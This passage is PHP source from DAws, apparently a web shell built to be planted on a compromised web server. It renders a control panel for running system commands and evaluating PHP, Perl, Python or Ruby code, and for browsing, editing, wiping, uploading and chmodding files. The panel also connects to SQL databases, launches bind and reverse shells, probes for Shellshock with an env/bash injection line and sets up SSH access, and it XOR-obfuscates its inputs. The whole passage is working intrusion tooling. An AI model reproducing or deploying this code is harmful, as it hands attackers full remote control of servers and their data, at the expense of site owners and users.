1566 $shell = str_replace("port=4444", "port=$port", $shell);
1567
1568 if (isset($_POST["background"])) {
1569 execute_script($shell, $location, $extension);
1570 } else {
1571 execute_script($shell, $location, $extension, True);
1572 }
1573}
1574
1575if (isset($_POST["dir"])) { //gets the proper value of 'dir'
1576 $dir = unxor_this($_POST["dir"]);
1577 $size = strlen($dir);
1578
1579 if ($_SESSION["windows"] == True) {
1580 $dir = str_replace('\\', '/', $dir); //that's better for Windows
1581 }
1582
1583 while ($dir[$size - 1] == '/') {
1584 $dir = substr($dir, 0, $size - 1);
1585 $size = strlen($dir);
1586 }
1587} else {
1588 $dir = getcwd();
1589}
1590
1591//html, css and js code
1592echo "
1593<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
1594'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
1595<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
1596<head>
1597<meta http-equiv='content-type' content='text/html; charset=utf-8'/>
1598<title>DAws</title>
1599<style type=\"text/css\">
1600 * {
1601 font-size: 12px;
1602 }
1603 html {
1604 overflow-y: scroll;
1605 }
1606 body {
1607 font-family: Verdana, Geneva, sans-serif;
1608 line-height: 1.4;
1609 background: #242625;
1610 color: #F9F7ED;
1611 margin: 0;
1612 padding: 0;
1613 }
1614 textarea {
1615 width: 80%;
1616 height: 150px;
1617 }
1618 a {
1619 color: #B3E1EF;
1620 text-decoration: none;
1621 }
1622 h1 a {
1623 font-weight: 100;
1624 font-size: 28px;
1625 color: #B3E1EF;
1626 }
1627 h3 {
1628 margin-top: 3%;
1629 margin-bottom: 1%;
1630 }
1631 h3 a {
1632 font-size: 18px;
1633 }
1634 caption, caption * {
1635 text-decoration: none;
1636 font-size:16px;
1637 color: #B3E1EF;
1638 margin-bottom: 5px;
1639 }
1640 .flat-table {
1641 text-align: center;
1642 background: #3F3F3F;
1643 margin-top: 1%;
1644 margin-bottom: 1%;
1645 border-collapse: collapse;
1646 border: 1px solid black;
1647 width: 100%;
1648 }
1649 .flat-table th {
1650 background: #2C2F2D;
1651 height: 30px;
1652 line-height: 30px;
1653 font-weight: 600;
1654 font-size: 14px;
1655 padding-left: 10px;
1656 color: #F9F7ED;
1657 border: 1px solid black;
1658 }
1659 .flat-table td {
1660 height: 30px;
1661 border: 1px solid black;
1662 }
1663 .flat-table-2 {
1664 text-align: center;
1665 background: #3F3F3F;
1666 margin-top: 10px;
1667 margin-bottom: 10px;
1668 width: 505px;
1669 height: 335px;
1670 }
1671 .flat-table tr:hover{
1672 background: rgba(0,0,0,0.19);
1673 }
1674 .danger {
1675 color: red;
1676 }
1677 .success {
1678 color: green;
1679 }
1680 .a_button {
1681 border: none;
1682 background: none;
1683 padding: 0;
1684 color: #B3E1EF;
1685 }
1686 .a_button:hover {
1687 text-decoration: underline;
1688 cursor: pointer;
1689 }
1690 .left {
1691 position: fixed;
1692 width: 18%;
1693 height: 95%;
1694 margin: 1%;
1695 top: 0;
1696 left: 0;
1697 overflow-y: auto;
1698 }
1699 .right {
1700 position: fixed;
1701 width: 18%;
1702 height: 95%;
1703 margin: 1%;
1704 top: 0;
1705 right: 0;
1706 overflow-y: auto;
1707 }
1708 .center {
1709 width: 60%;
1710 margin-left: 20%;
1711 }
1712</style>
1713
1714<script>
1715function xor_str(to_xor) { //javascript encryption used for our live inputs.
1716 var key = \"".$_SESSION['key']."\";
1717 var the_res = \"\";
1718 for(i=0; i<to_xor.length;) {
1719 for(j=0; (j<key.length && i<to_xor.length); ++j,++i) {
1720 the_res+=String.fromCharCode(to_xor.charCodeAt(i)^key.charCodeAt(j));
1721 }
1722 }
1723 return btoa(the_res);
1724}
1725
1726function xorencr(input) { //gets our inputs as an array and uses 'xor_str` to encrypt them.
1727 var arrayLength = input.length;
1728 var field = String();
1729 for (var i = 0; i < arrayLength; i++) {
1730 field = document.getElementById(input[i]);
1731 field.value = xor_str(field.value);
1732 }
1733}
1734
1735function show_div(div_name) { //used by the 'rename' form in the file manager to show/hide the div when clicked.
1736 if (document.getElementById(div_name).style.display == \"block\") {
1737 document.getElementById(div_name).style.display = \"none\";
1738 } else {
1739 document.getElementById(div_name).style.display = \"block\";
1740 }
1741}
1742
1743</script>
1744</head>
1745
1746<body>
1747
1748<div class='left' id='left'>
1749<table class='flat-table' style='width:100%;height:100%;'>
1750 <caption>Various information</caption>
1751 <tr>
1752 <th style='width:40%;'>Info</th>
1753 <th>Value</th>
1754 </tr>
1755 <tr>
1756 <td>Version</td>
1757 <td>".php_uname()."</td>
1758 </tr>
1759 <tr>
1760 <td>Server's IP</td>";
1761 if ($_SERVER['SERVER_ADDR'] != null) {
1762 echo "<td>".$_SERVER['SERVER_ADDR']."</td>";
1763 } else { //for IIS
1764 echo "<td>".$_SERVER['HTTP_HOST']."</td>";
1765 }
1766 echo "</tr>
1767 <tr>
1768 <td>Process Owner</td>
1769 <td>".$_SESSION["process_owner"]."</td>
1770 </tr>";
1771
1772 $group_name = "";
1773 if (installed_php("posix_geteuid")) { //Linux
1774 $group_name = posix_getgrgid(posix_geteuid());
1775 $group_name = $group_name["name"];
1776 }
1777 echo "
1778 <tr>
1779 <td>Group Name</td>
1780 <td>".$group_name."</td>
1781 </tr>";
1782
1783 echo "
1784 <tr>
1785 <td>Script Owner</td>
1786 <td>".get_current_user()."</td>
1787 </tr>
1788 <tr>
1789 <td>Disk Total Space</td>
1790 <td>".floor((disk_total_space(realpath("/")))/(1073741824))." GB</td>
1791 </tr>";
1792
1793if ($_SESSION["windows"] == True) { //causing the shell to load slowly because of the command itself but it's worth it
1794 $total_amount = execute_command("wmic memorychip get capacity");
1795 $total_amount = explode("\n", $total_amount);
1796 unset($total_amount[0]);
1797 $total_memory = 0;
1798 foreach ($total_amount as $amount) {
1799 $total_memory += $amount;
1800 }
1801 $total_memory /= 1073741824;
1802
1803 echo "
1804 <tr>
1805 <td>Total RAM</td>
1806 <td>$total_memory GB</td>
1807 </tr>";
1808} else {
1809 $total_memory = execute_command("free -mt | grep Mem | awk '{print \$2}'");
1810 if ($total_memory != null) {
1811 echo "
1812 <tr>
1813 <td>Total RAM</td>
1814 <td>".($total_memory/1024)." GB</td>
1815 </tr>";
1816 }
1817}
1818
1819echo "
1820 <tr>
1821 <td>Your IP</td>
1822 <td>".$_SERVER['REMOTE_ADDR']."</td>
1823 </tr>
1824 <tr>
1825 <td>Encryption Key</td>
1826 <td>".$_SESSION["key"]."</td>
1827 </tr>
1828 <tr>
1829 <td>DAws's Directory</td>
1830 <td>".$_SESSION["daws_directory"]."</td>
1831 </tr>
1832 <tr>
1833 <td>CGI</td>
1834 <td>";
1835 if ($_SESSION["cgi"]) {
1836 echo "True</td>";
1837 } else {
1838 echo "False</td>";
1839 }
1840echo "
1841 </tr>
1842 <tr>
1843 <td>CGI Shell</td>
1844 <td>".$_SESSION["cgi_url"]."</td>
1845 </tr>
1846 <tr>
1847 <td>Shellshock threw DAws</td>
1848 <td>";
1849 if ($_SESSION["shsh"]) {
1850 echo "True</td>";
1851 } else {
1852 echo "False</td>";
1853 }
1854echo "
1855 </tr>
1856 <tr>
1857 <td>Shellshock</td>
1858 <td>";
1859 if (execute_command("env x='() { :;}; echo dotcppfile' bash -c \"echo dotcppfile\"") == "dotcppfile\ndotcppfile\n") {
1860 echo "True</td>";
1861 } else {
1862 echo "False</td>";
1863 }
1864echo "
1865 </tr>
1866 <tr>
1867 <td>SSH Method</td>
1868 <td>";
1869
1870 if ((isset($_SESSION["ssh"])) && ($_SESSION["ssh"] == True)) {
1871 echo "True</td>";
1872 } else {
1873 echo "False</td>";
1874 }
1875echo "
1876 </tr>
1877</table>
1878</div>
1879
1880<div class='right'>
1881<table class='flat-table' style='table-layout: fixed;'>
1882 <caption>
1883 <form style='display:inline;' action='#File Manager' method='post'>
1884 <input type='hidden' name='dir' value='".xor_this($_SESSION["daws_directory"])."' />
1885 <input type='submit' value=\"DAws's directory\" class='a_button'/>
1886 </form>
1887 </caption>
1888 <tr>
1889 <th style='width: 20%;'>Type</th>
1890 <th>Name</th>
1891 </tr>";
1892
1893
1894if ($handle = opendir($_SESSION["daws_directory"])) {
1895 $rows = array();
1896 $pos = strrpos($_SESSION["daws_directory"], "/");
1897 $topdir = substr($_SESSION["daws_directory"], 0, $pos + 1);
1898 $i = 0;
1899 while (false !== ($file = readdir($handle))) {
1900 if ($file != "." && $file != "..") {
1901 $rows[$i]['data'] = $file;
1902 $rows[$i]['dir'] = is_dir($_SESSION["daws_directory"] . "/" . $file);
1903 $i++;
1904 }
1905 }
1906 closedir($handle);
1907
1908 $size = count($rows);
1909
1910 if ($size != 0) {
1911 $rows = sortRows($rows);
1912
1913 for ($i = 0; $i < $size; ++$i) {
1914 $curr_dir = $_SESSION["daws_directory"] . "/" . $rows[$i]['data'];
1915 echo "<tr><td>";
1916 if ($rows[$i]['dir']) {
1917 echo "[DIR]";
1918 } else {
1919 echo "[FILE]";
1920 }
1921
1922 echo "</td>";
1923
1924 if (is_readable($curr_dir)) {
1925 echo "
1926 <td>
1927 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
1928 <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
1929 <input type='hidden' name='old_dir' value='".xor_this($_SESSION["daws_directory"])."' />
1930 <input type='submit' value='".$rows[$i]['data']."' class='a_button' />
1931 </form>
1932 </td>";
1933 } else {
1934 echo "<td>".$rows[$i]['data']."</td>";
1935 }
1936 }
1937 }
1938}
1939
1940echo "
1941</table>
1942</div>
1943
1944<div class='center' id='center'>
1945<center>
1946
1947<h1><a href=".$_SERVER['PHP_SELF'].">DAws</a> 5/12/2015</h1>
1948
1949Coded by <a href=\"https://twitter.com/dotcppfile\">dotcppfile</a> and Team Salvation
1950
1951<h3><A NAME='Commander' href='#Commander'>Commander</A></h3>
1952
1953<p class='danger'>Using full paths in your commands is suggested.</p>
1954
1955<table class='flat-table' style='table-layout:fixed; word-wrap:break-word;'>
1956 <tr>
1957 <td style='width: 20%;'>disabled php</td>
1958 <td style='word-wrap:break-word;'>".implode(",", $GLOBALS["disabled_php"])."</td>
1959 </tr>
1960 <tr>
1961 <td style='width: 20%;'>disabled suhosin</td>
1962 <td style='word-wrap:break-word;'>".implode(",", $GLOBALS["disabled_suhosin"])."</td>
1963 </tr>
1964 <form style='display:inline;' action='#Commander' method='post' onsubmit=\"xorencr(['command'])\">
1965 <tr>
1966 <td style='height:50px;' colspan='2'>Command:
1967 <input type='text' size='40%' name='command' id='command'/>
1968 <input type='hidden' name='dir' value='".xor_this($dir)."'/>
1969 <input type='submit' value='Execute'/>
1970 </td>
1971 </tr>";
1972
1973if (isset($GLOBALS["command"])) {
1974 echo "
1975 <tr>
1976 <td style='text-align:left; padding:1%;' colspan='2'>".$GLOBALS["command"]."</td>
1977 </tr>";
1978}
1979
1980echo "
1981 </form>
1982</table>
1983
1984
1985<h3><A NAME='File Manager' href='#File Manager'>File Manager</A></h3>
1986
1987<p class='danger'>Uploading and Zipping functions ouputs in DAws's directory.</p>";
1988
1989if (file_exists($dir) && (is_readable($dir))) {
1990 if (is_dir($dir)) {
1991 echo "
1992 <table class='flat-table' style='height: 100px;'>
1993 <tr>
1994 <td>Shell's Directory:
1995 <form style='display:inline;' action='#File Manager' method='post'>
1996 <input type='hidden' name='dir' value='".xor_this(getcwd())."' />
1997 <input type='submit' value='".getcwd()."' class='a_button' />
1998 </form>
1999 </td>
2000 </tr>
2001 <tr>
2002 <td>Current Directory: $dir</td>
2003 </tr>
2004 <tr>
2005 <td>Change Directory/Read File:
2006 <form action='#File Manager' method='post' onsubmit=\"xorencr(['dir'])\" style='display:inline'>
2007 <input style='width:250px' name='dir' id='dir' type='text' value='$dir'/>
2008 <input name='old_dir' id='old_dir' type='hidden' value='".xor_this($dir)."'/>
2009 <input type='submit' value='Change' name='Change'/>
2010 </form>
2011 </td>
2012 </tr>
2013 </table>";
2014
2015 if ($handle = opendir($dir)) {
2016 $rows = array();
2017 $pos = strrpos($dir, "/");
2018 $topdir = substr($dir, 0, $pos + 1);
2019 $i = 0;
2020 while (false !== ($file = readdir($handle))) {
2021 if ($file != "." && $file != "..") {
2022 $rows[$i]['data'] = $file;
2023 $rows[$i]['dir'] = is_dir($dir . "/" . $file);
2024 $i++;
2025 }
2026 }
2027 closedir($handle);
2028
2029 $size = count($rows);
2030
2031 echo "
2032 <table class='flat-table'>
2033 <tr>
2034 <th>Type</th>
2035 <th>Name</th>
2036 <th>Size (bytes)</th>
2037 <th>File Owner</th>
2038 <th>File Group</th>
2039 <th>Permissions</th>
2040 <th>Actions</th>
2041 </tr>
2042
2043 <tr>
2044 <td>[UP]</td>
2045 <td>
2046 <form style='display:inline;' action='#File Manager' method='post'>
2047 <input type='hidden' name='dir' value='".xor_this($topdir)."' />
2048 <input type='hidden' name='old_dir' value='".xor_this($dir)."'/>
2049 <input type='submit' value='..' class='a_button' />
2050 </form>
2051 </td>
2052 <td></td>
2053 <td></td>
2054 <td></td>
2055 <td></td>
2056 <td></td>
2057 </tr>";
2058
2059 if ($size != 0) {
2060 $rows = sortRows($rows);
2061
2062 for ($i = 0; $i < $size; ++$i) {
2063 $curr_dir = $dir . "/" . $rows[$i]['data'];
2064 echo "<tr><td>";
2065 if ($rows[$i]['dir']) {
2066 echo "[DIR]";
2067 } else if (is_link($curr_dir) == False) {
2068 echo "[FILE]";
2069 } else {
2070 echo "[LINK]";
2071 }
2072 echo "</td>";
2073
2074 if (is_readable($curr_dir)) {
2075 if (is_link($curr_dir)) {
2076 $rows[$i]['data'] .= " -> ".readlink($curr_dir);
2077 }
2078
2079 echo "
2080 <td>
2081 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2082 <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
2083 <input type='hidden' name='old_dir' value='".xor_this($dir)."' />
2084 <input type='submit' value='".$rows[$i]['data']."' class='a_button' />
2085 </form>
2086 </td>";
2087 } else {
2088 echo "<td>".$rows[$i]['data']."</td>";
2089 }
2090
2091 if (is_executable($dir)) {
2092 echo "<td>".@filesize($curr_dir)."</td>";
2093 } else {
2094 echo "<td></td>";
2095 }
2096
2097 $fileowner = "";
2098 $filegroup = "";
2099 if ((is_executable($dir)) && (installed_php("fileowner")) && (installed_php("filegroup"))) {
2100 $fileowner = @fileowner($curr_dir);
2101 $filegroup = @filegroup($curr_dir);
2102
2103 if (installed_php("posix_getpwuid")) {
2104 $fileowner = @posix_getpwuid($fileowner);
2105 $fileowner = $fileowner["name"]; //don't blame me for this, blame old versions of php...
2106 $filegroup = @posix_getgrgid($filegroup);
2107 $filegroup = $filegroup["name"];
2108 }
2109 }
2110 echo "<td>$fileowner</td>";
2111 echo "<td>$filegroup</td>";
2112
2113 if (is_executable($dir)) {
2114 echo "<td>".@get_permissions($curr_dir)."</td>";
2115 } else {
2116 echo "<td></td>";
2117 }
2118
2119 echo "<td>";
2120 if (is_dir($curr_dir)) { //for directories only
2121 if (is_readable($curr_dir)) {
2122 echo "
2123 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2124 <input type='hidden' name='zip' value='".xor_this($curr_dir)."'/>
2125 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2126 <input type='submit' class='a_button' value='Zip'/>
2127 </form>";
2128 }
2129 } else { //for files only
2130 if (is_readable($curr_dir)) {
2131 echo "
2132 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2133 <input type='hidden' name='download' value='".xor_this($curr_dir)."'/>
2134 <input type='submit' class='a_button' value='Download'/>
2135 </form>";
2136 }
2137
2138 if ((is_readable($curr_dir)) && (is_writable($curr_dir))) {
2139 echo "
2140 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2141 <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
2142 <input type='hidden' name='old_dir' value='".xor_this($dir)."' />
2143 <input type='submit' class='a_button' value='Edit'/>
2144 </form>";
2145
2146 echo "
2147 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2148 <input type='hidden' name='wipe' value='".xor_this($curr_dir)."'/>
2149 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2150 <input type='submit' class='a_button' value='Wipe'/>
2151 </form>";
2152 }
2153 }
2154
2155 if ((is_readable($dir)) && (is_writable($dir)) && (is_executable($dir))) {
2156 echo "
2157 <input type='button' class='a_button' value='Rename' onclick=\"show_div('rename-".xor_this($curr_dir)."')\"/>
2158
2159 <div id='rename-".xor_this($curr_dir)."' style='display:none;'>
2160 <form action='#File Manager' method='post' onsubmit=\"xorencr(['new_name-".xor_this($curr_dir)."'])\">
2161 <input style='width:150px' name='new_name' id='new_name-".xor_this($curr_dir)."' type='text' value=''/>
2162 <input type='hidden' name='old_name' value='".xor_this($curr_dir)."'/>
2163 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2164 <input type='submit' value='Rename'/>
2165 </form>
2166 </div>";
2167
2168
2169 echo "
2170 <form style='font-color=;display:inline;' action='#File Manager' method='post'>
2171 <input type='hidden' name='del' value='".xor_this($curr_dir)."'/>
2172 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2173 <input type='submit' class='a_button' value='Del'/>
2174 </form>";
2175 }
2176
2177 if ($_SESSION["process_owner"] == $fileowner) { //can we chmod?
2178 echo "
2179 <input type='button' class='a_button' value='Chmod' onclick=\"show_div('chmod-".xor_this($curr_dir)."')\"/>
2180
2181 <div id='chmod-".xor_this($curr_dir)."' style='display:none;'>
2182 <form action='#File Manager' method='post' onsubmit=\"xorencr(['new_chmod-".xor_this($curr_dir)."'])\">
2183 <input style='width:150px' name='new_chmod' id='new_chmod-".xor_this($curr_dir)."' type='text' value='' placeholder='Example: 666'/>
2184 <input type='hidden' name='file_name' value='".xor_this($curr_dir)."' />
2185 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2186 <input type='submit' value='Chmod'/>
2187 </form>
2188 </div>";
2189 }
2190
2191 echo "</td></tr>";
2192 }
2193 }
2194
2195 echo "
2196 </table>
2197 <table class='flat-table' style='height: 100px;'>
2198 <tr>
2199 <form action='#File Manager' method='post' enctype='multipart/form-data'>
2200 <td>Upload File(s) (Browse):</td>
2201 <td><input type='file' value='Browse' name='file_upload[]' multiple/></td>
2202 <input type='hidden' name='dir' value='".xor_this($dir)."'/>
2203 <td><input type='submit' value='Upload'/></td>
2204 </form>
2205 </tr>
2206 <tr>
2207 <form action='#File Manager' method='post' onsubmit=\"xorencr(['link_download'])\">
2208 <td>Upload File (Link):</td>
2209 <td><input placeholder='Direct Links required!' style='width:80%' id='link_download' name='link_download' type='text'/></td>
2210 <input type='hidden' name='dir' value='".xor_this($dir)."'/>
2211 <td><input type='submit' value='Upload'/></td>
2212 </form>
2213 </tr>";
2214
2215 if (is_writable($dir)) {
2216 echo "
2217 <tr>
2218 <form action='#File Manager' method='post' onsubmit=\"xorencr(['mkfile'])\">
2219 <td>Create File:</td>
2220 <td><input style='width:80%' id='mkfile' name='mkfile' type='text'/></td>
2221 <input type='hidden' name='dir' value='".xor_this($dir)."'/>
2222 <td><input type='submit' value='Create'/></td>
2223 </form>
2224 </tr>
2225 <tr>
2226 <form action='#File Manager' method='post' onsubmit=\"xorencr(['mkdir'])\">
2227 <td>Create Folder:</td>
2228 <td><input style='width:80%' id='mkdir' name='mkdir' type='text'/></td>
2229 <input type='hidden' name='dir' value='".xor_this($dir)."'/>
2230 <td><input type='submit' value='Create'/></td>
2231 </form>
2232 </tr>";
2233 }
2234
2235 echo "</table>";
2236 }
2237 } else {
2238 $content = read_file($dir);
2239
2240 echo "
2241 <br/>
2242 <form action='#File Manager' method='post'>
2243 <input type='hidden' name='dir' value='".$_POST["old_dir"]."' />
2244 <input type='submit' value='Go Back' class='a_button' />
2245 </form>";
2246
2247 if (is_writable($dir)) {
2248 echo "
2249 <table class='flat-table' style='table-layout: fixed;'>
2250 <tr>
2251 <form action='#File Manager' method='post' onsubmit=\"xorencr(['edit'])\">
2252 <td style='padding:1%;'>
2253 <textarea id='edit' name='edit'>$content</textarea><br/>
2254 <input type='hidden' name='location' value='".xor_this($dir)."'/>
2255 <input type='hidden' name='old_dir' value='".$_POST["old_dir"]."' />
2256 <input type='submit' value='Edit'/>
2257 </td>
2258 </form>
2259 </tr>
2260 </table>";
2261 } else {
2262 echo "
2263 <table class='flat-table' style='table-layout: fixed;'>
2264 <tr>
2265 <td><textarea name='edit'>$content</textarea></td>
2266 </tr>
2267 </table>";
2268 }
2269 }
2270} else {
2271 echo "
2272 <form action='#File Manager' method='post'>
2273 <input type='hidden' name='dir' value='".$_POST["old_dir"]."' />
2274 <input type='submit' value='Go Back' class='a_button' />
2275 </form>
2276 <p class='danger'>`$dir` is not read readable or doesn't exist!</p>";
2277}
2278
2279echo "
2280<h3><A NAME='Eval' href='#Eval'>Eval</A></h3>
2281
2282<p class='danger'>DO NOT include '<?php' at the beginning or '?>' at the end for Php.</p>
2283
2284<table class='flat-table' style='table-layout: fixed;'>
2285 <tr>
2286 <form action='#Eval 'method='post' onsubmit=\"xorencr(['eval_code'])\">
2287 <td style='padding:1%;'>
2288 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2289 <textarea name='eval_code' id='eval_code'></textarea><br/>
2290 <input type='submit' value='Execute'/>
2291 <select name='eval_lang'>
2292 <option value='".xor_this("Php")."'>Php</option>";
2293if ($_SESSION["perl"] != null) {
2294 echo "<option value='".xor_this("Perl")."'>Perl</option>";
2295}
2296if ($_SESSION["python"] != null) {
2297 echo "<option value='".xor_this("Python")."'>Python</option>";
2298}
2299if ($_SESSION["ruby"] != null) {
2300 echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
2301}
2302echo "
2303 </select>
2304 <input name='output_needed' type='checkbox'/>Show Output
2305 </td>
2306 </form>
2307 </tr>";
2308
2309if (isset($_POST["eval_code"])) {
2310 $eval_code = unxor_this($_POST["eval_code"]);
2311 $eval_lang = unxor_this($_POST["eval_lang"]);
2312
2313 if (isset($_POST["output_needed"])) {
2314 $output_needed = True;
2315 } else {
2316 $output_needed = False;
2317 }
2318
2319 echo "<tr><td>";
2320 if ($eval_lang == "Php") {
2321 execute_php($eval_code, $output_needed);
2322 } else if ($eval_lang == "Perl") {
2323 echo execute_script($eval_code, $_SESSION["perl"], "pl", $output_needed);
2324 } else if ($eval_lang == "Python") {
2325 echo execute_script($eval_code, $_SESSION["python"], "py", $output_needed);
2326 } else if ($eval_lang == "Ruby") {
2327 echo execute_script($eval_code, $_SESSION["ruby"], "rb", $output_needed);
2328 }
2329 echo "</td></tr>";
2330}
2331
2332echo "
2333</table>
2334
2335<h3><A NAME='Sql Connect' href='#Sql Connect'>Sql Connect</A></h3>
2336
2337<table class='flat-table' style='table-layout: fixed;'>
2338
2339 <form action='#Sql Connect 'method='post' onsubmit=\"xorencr(['sql_host', 'sql_user', 'sql_pass', 'sql_database'])\">
2340 <tr>
2341 <td style='padding:1%;'>
2342 Connection:
2343 <input placeholder='Sql Host' type='text' name='sql_host' id='sql_host' style='width:15%;'/>
2344 <input placeholder='Sql User' type='text' name='sql_user' id='sql_user' style='width:15%;'/>
2345 <input placeholder='Sql Password' type='text' name='sql_pass' id='sql_pass' style='width:15%;'/>
2346 <input placeholder='Sql Database' type='text' name='sql_database' id='sql_database' style='width:15%;'/>
2347 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2348 <input type='submit' value='Connect'/>
2349 </td>
2350 </tr>
2351 </form>";
2352
2353if ((isset($_SESSION["mysqli"])) && ($_SESSION["mysqli"] == True)) {
2354 echo "
2355 <form action='#Sql Connect' method='post' onsubmit=\"xorencr(['sql_execute'])\">
2356 <tr>
2357 <td style='padding:1%;'>
2358 Query: <input type='text' style='width:40%;' name='sql_execute' id='sql_execute'/>
2359 <input type='hidden' name='dir' value='".xor_this($dir)."' />
2360 <input type='submit' value='Execute'/>
2361 <input type='checkbox' name='save_output' value='Save Output'/>Save Output
2362 </td>
2363 </tr>
2364 </form>";
2365}
2366
2367if (isset($GLOBALS["sql_output"])) {
2368 echo "
2369 <tr>
2370 <td style='padding:1%;'><textarea>".$GLOBALS["sql_output"]."</textarea></td>
2371 </tr>";
2372}
2373
2374echo "
2375</table>
2376
2377<h3><A NAME='Bind Shells' href='#Bind Shells'>Bind Shells</A></h3>
2378
2379<table class='flat-table' style='table-layout: fixed;'>
2380<form method='post' action='#Bind Shells' onsubmit=\"xorencr(['bind_port'])\">
2381 <tr>
2382 <td style='padding: 1%'>
2383 Info:
2384 <input name='bind_port' id='bind_port' placeholder='Port' type='text'/>
2385 <select name='bs_lang'>";
2386if ($_SESSION["perl"] != null) {
2387 echo "<option value='".xor_this("Perl")."'>Perl</option>";
2388}
2389if ($_SESSION["python"] != null) {
2390 echo "<option value='".xor_this("Python")."'>Python</option>";
2391}
2392if ($_SESSION["ruby"] != null) {
2393 echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
2394}
2395if (($_SESSION["windows"] == False) && (execute_command("nc", True))) {
2396 echo "<option value='".xor_this("Netcat")."'>Netcat</option>";
2397}
2398echo "
2399 </select>
2400 <input type='submit' value='Bind'/>
2401 <input type='checkbox' name='background'/>Run in background
2402 </td>
2403 </tr>
2404</form>
2405</table>
2406
2407<h3><A NAME='Reverse Shells' href='#Reverse Shells'>Reverse Shells</A></h3>
2408
2409<table class='flat-table' style='table-layout: fixed;'>
2410<form method='post' action='#Bind Shells' onsubmit=\"xorencr(['reverse_ip', 'reverse_port'])\">
2411 <tr>
2412 <td style='padding: 1%'>
2413 Info:
2414 <input name='reverse_ip' id='reverse_ip' placeholder='IP Address' type='text'/>
2415 <input name='reverse_port' id='reverse_port' placeholder='Port' type='text'/>
2416 <select name='rs_lang'>";
2417if ($_SESSION["perl"] != null) {
2418 echo "<option value='".xor_this("Perl")."'>Perl</option>";
2419}
2420if ($_SESSION["python"] != null) {
2421 echo "<option value='".xor_this("Python")."'>Python</option>";
2422}
2423if ($_SESSION["ruby"] != null) {
2424 echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
2425}
2426if ($_SESSION["windows"] == False) {
2427 echo "<option value='".xor_this("Bash")."'>Bash</option>";
2428}
2429echo "
2430 </select>
2431 <input type='submit' value='Bind'/>
2432 <input type='checkbox' name='background'/>Run in background
2433 </td>
2434 </tr>
2435</form>
2436</table>";
2437
2438if ($_SESSION["windows"] == False) { //linux only for now
2439 echo "
2440 <h3><A NAME='Setup SSH' href='#Setup SSH'>Setup SSH</A></h3>
2441
2442 <p class='danger'>Make sure you upload all the files in 'https://github.com/dotcppfile/DAws/tree/master/phpseclib%20-%20DAws', using the File Manager, first.</p>
2443
2444 <table class='flat-table' style='table-layout: fixed;'>
2445 <form method='post' action='#Setup SSH' onsubmit=\"xorencr(['ssh_user', 'ssh_port', 'home_dir'])\">
2446 <tr>
2447 <td style='padding: 1%'>
2448 Info:
2449 <input name='ssh_user' id='ssh_user' placeholder='SSH Username' type='text'/>
2450 <input name='ssh_port' id='ssh_port' placeholder='SSH Port' type='text'/>
2451 <input name='home_dir' id='home_dir' placeholder='Home Directory' type='text'/>
2452 <input type='submit' value='Go'/>
2453 </td>
2454 </tr>
2455 </form>
2456 </table>";
2457}
2458
2459echo "
2460</center>
2461</div>
2462
2463</body>
2464</html>";
2465?>